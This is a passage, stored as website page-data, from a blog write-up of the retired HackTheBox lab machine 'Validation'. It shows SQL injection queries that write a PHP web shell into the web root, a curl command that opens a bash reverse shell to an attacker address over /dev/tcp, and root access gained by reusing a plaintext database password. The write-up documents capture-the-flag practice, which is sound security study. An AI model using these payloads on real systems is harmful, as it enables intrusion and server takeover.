operator\">=</span> <span class=\"token 
string\">'&lt;table name>'</span>\n\n-- Check user privileges\n<span class=\"token keyword\">select</span> privilege_type FROM information_schema.user_privileges where grantee <span class=\"token operator\">=</span> <span class=\"token string\">\"&lt;username>\"</span>\n\n-- Write to a <span class=\"token function\">file</span> <span class=\"token punctuation\">(</span>only possible <span class=\"token keyword\">if</span> the user has FILE privilege<span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">select</span> <span class=\"token string\">\"Test\"</span> into outfile <span class=\"token string\">'/var/www/html/Test.txt'</span>\n\n-- Write a web shell\n<span class=\"token keyword\">select</span> <span class=\"token string\">\"&lt;?php SYSTEM(<span class=\"token variable\">$_REQUEST</span>['cmd']); ?>\"</span> into outfile <span class=\"token string\">'/var/www/html/webshell.php'</span></code></pre></div>\n<p>What mattered most here was that the database user had the <code class=\"language-text\">FILE</code> privilege when I displayed its <code class=\"language-text\">privilege_type</code>.</p>\n<p>That means the DB user had permission to access files on the local system.</p>\n<p>Reference: <a href=\"https://dev.mysql.com/doc/refman/5.6/ja/privileges-provided.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">MySQL 5.6 Reference Manual: Privileges Provided by MySQL</a></p>\n<p>As a result, I was able to drop a web shell via SQLi using <code class=\"language-text\">into outfile</code>.</p>\n<p>After that, I could obtain the user flag by triggering a reverse shell against the web shell.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token function\">curl</span> <span class=\"token string\">\"http://10.10.11.116/webshell.php\"</span> --data-urlencode <span class=\"token string\">\"cmd=bash -c '/bin/bash -l > /dev/tcp/10.10.0.0/4444 0&lt;&amp;1 
2>&amp;1'\"</span></code></pre></div>\n<h2 id=\"privilege-escalation\" style=\"position:relative;\"><a href=\"#privilege-escalation\" aria-label=\"privilege escalation permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Privilege Escalation</h2>\n<p>After logging in locally, I looked at <code class=\"language-text\">config.php</code> and found the user’s password written there.</p>\n<div class=\"gatsby-highlight\" data-language=\"php\"><pre class=\"language-php\"><code class=\"language-php\"><span class=\"token php language-php\"><span class=\"token delimiter important\">&lt;?php</span>\n  <span class=\"token variable\">$servername</span> <span class=\"token operator\">=</span> <span class=\"token string double-quoted-string\">\"127.0.0.1\"</span><span class=\"token punctuation\">;</span>\n  <span class=\"token variable\">$username</span> <span class=\"token operator\">=</span> <span class=\"token string double-quoted-string\">\"uhc\"</span><span class=\"token punctuation\">;</span>\n  <span class=\"token variable\">$password</span> <span class=\"token operator\">=</span> <span class=\"token string double-quoted-string\">\"uhc-9qual-global-pw\"</span><span class=\"token punctuation\">;</span>\n  <span class=\"token variable\">$dbname</span> <span class=\"token operator\">=</span> <span class=\"token string double-quoted-string\">\"registration\"</span><span class=\"token punctuation\">;</span>\n\n  <span class=\"token variable\">$conn</span> <span class=\"token operator\">=</span> <span 
class=\"token keyword\">new</span> <span class=\"token class-name\">mysqli</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$servername</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$username</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$password</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$dbname</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token delimiter important\">?></span></span></code></pre></div>\n<p>With that, running <code class=\"language-text\">su root</code> gives you root privileges.</p>\n<h2 id=\"conclusion\" style=\"position:relative;\"><a href=\"#conclusion\" aria-label=\"conclusion permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Conclusion</h2>\n<p>I decided to study hacking seriously, so for now I plan to keep grinding retired machines.</p>","fields":{"slug":"/hackthebox-linux-validation-en","tagSlugs":["/tag/hack-the-box-en/","/tag/linux-en/","/tag/easy-box-en/","/tag/english/"]},"frontmatter":{"date":"2021-10-30","description":"This is a writeup of the retired HackTheBox machine \"Validation\".","tags":["HackTheBox (en)","Linux (en)","EasyBox (en)","English"],"title":"[Easy/Linux] Validation Writeup 
(HackTheBox)","socialImage":{"publicURL":"/static/dc4d8b7f8795f3c3d3489d9957d155f2/no-image.png"}}}},"pageContext":{"slug":"/hackthebox-linux-validation-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}